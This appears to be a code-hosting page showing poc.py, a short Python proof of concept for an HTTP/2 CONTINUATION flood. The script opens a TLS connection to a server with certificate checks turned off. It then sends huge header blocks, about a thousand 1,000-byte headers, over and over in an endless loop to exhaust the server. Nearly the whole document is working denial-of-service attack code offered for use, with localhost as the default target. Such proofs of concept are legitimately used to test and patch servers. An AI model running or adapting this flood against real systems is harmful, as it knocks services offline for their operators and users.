-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathpoc.py
33 lines (24 loc) · 948 Bytes
/
poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import socket
import ssl
from h2 import connection, config
def continuation_flood(url='localhost', port=8000):
sock = socket.create_connection((url, port))
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.set_alpn_protocols(['h2'])
sock = ctx.wrap_socket(sock, server_hostname=url)
cfg = config.H2Configuration(client_side=True)
conn = connection.H2Connection(config=cfg)
conn.initiate_connection()
headers = [(':method', 'GET'), (':authority', url), (':path', '/'), (':scheme', 'https')]
# Create a lot of big headers to flood the server with CONTINUATION frames
headers.extend([('flood', 'X'*1000)]*1000)
while True:
conn.send_headers(
conn.get_next_available_stream_id(),
headers
)
sock.send(conn.data_to_send())
if __name__ == "__main__":
continuation_flood()